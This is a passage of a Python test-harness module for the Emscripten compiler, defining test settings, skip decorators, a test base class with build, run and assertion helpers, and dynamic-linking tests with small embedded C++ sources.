from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# Also support the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Setting a value to None means clearing the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
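# A minimal usage sketch of env_modify (hedged: EMCC_DEBUG and EMCC_CORES are
# only example variable names here). A value of None clears the variable, and
# the whole environment is restored when the context exits:
#
#     with env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None}):
#         pass  # run something that reads os.environ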
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
]
if shared.Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if shared.Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.save_dir = EMTEST_SAVE_DIR
self.env = {}
self.temp_files_before_run = []
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
return
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
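# Small illustration of what serialize_settings() produces (example values):
# {'EXIT_RUNTIME': 1, 'EXPORTED_FUNCTIONS': ['_main']} becomes
# ['-s', 'EXIT_RUNTIME', '-s', 'EXPORTED_FUNCTIONS=["_main"]'].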
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
Building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
Building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
Building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
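# Illustrative note (hypothetical filenames, not from a real test): when
# main_file is False, an args list like ['--pre-js', 'pre.js', '-O2'] is
# reduced to ['-O2'] above, since both the flag and its argument are dropped
# for library builds.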
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [PYTHON, compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
Building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
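# Illustrative note: in the disassembled text an export typically appears as a
# line like (export "main" (func $main)), so the substring check above matches
# on the '(export "<name>"' prefix regardless of what kind of item is exported.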
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the two given pieces of multiline text are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % limit_size(values[0]), limit_size(y))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
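# Note on the cache key built above (descriptive only): cache_name is the
# library name, plus the short (< 7 character) emcc args joined with commas,
# plus an md5 of the full emcc args and env_init, plus cache_name_extra, with
# any character outside letters/digits/underscore replaced by '_'.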
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
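# Hypothetical usage sketch (the input file and expected message below are
# made up, not taken from a real test):
#   err = self.expect_fail([PYTHON, EMCC, 'no_such_file.c'])
#   self.assertContained('error', err)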
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run in the browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
